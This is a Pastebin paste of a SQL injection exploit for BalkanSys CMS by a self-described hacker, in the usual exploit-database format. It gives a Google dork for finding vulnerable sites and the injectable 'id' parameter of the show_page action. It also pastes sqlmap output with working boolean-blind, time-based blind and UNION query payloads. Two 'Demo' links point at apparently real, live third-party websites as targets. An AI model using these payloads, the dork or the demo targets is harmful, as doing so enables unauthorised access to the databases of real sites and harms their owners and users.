Advertisement
xBADGIRL21

BalkanSys CMS show_pageID SQL injection | xBADGIRL21

Jul 5th, 2016
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.51 KB | None | 0 0
  1. ######################
  2. # Exploit Title : BalkanSys CMS show_pageID SQL injection
  3. # Exploit Author : xBADGIRL21
  4. # Dork : inurl:/?act=show_page or inurl:/?act=show_page "Balkansys"
  5. # Category: [ Webapps ]
  6. # Tested on: [ Linux | Windows ]
  7. # Vendore : http://balkansys.com/
  8. # skype:xbadgirl21
  9. # Date: 2016/07/05
  10. # video Proof : https://youtu.be/pdLAMA2bBrQ
  11. ######################
  12. # PoC:
  13. # http://www.site.com/?act=show_page&id=[SQLi]
  14. ######################
  15. + test:=> http://www.site.com/?act=show_page&id=[76] INJECT HERE
  16. # respone:==>
  17. # [09:39:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' " injectable "
  18. # Parameter: id (GET)
  19. # Type: boolean-based blind
  20. # Title: AND boolean-based blind - WHERE or HAVING clause
  21. # Payload: act=show_page&id=76' AND 9301=9301 AND 'thUL'='thUL
  22. #
  23. # Type: AND/OR time-based blind
  24. # Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  25. # Payload: act=show_page&id=76' AND (SELECT * FROM (SELECT(SLEEP(5)))oZvn) AND 'ysNR'='ysNR
  26. #
  27. # Type: UNION query
  28. # Title: Generic UNION query (NULL) - 19 columns
  29. # Payload: act=show_page&id=-8914' UNION ALL SELECT #NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627671,0x4d4b6d63774a4d4e546c,0x717a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  30. + Demo
  31. + http://optela.com/?act=show_page&id=76
  32. + http://saturaad.com/?act=show_page&id=165
  33. ######################
  34. # Discovered by : xBADGIRL21
  35. # Greetz : All Mauritanien Hackers - NoWhere
  36. #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement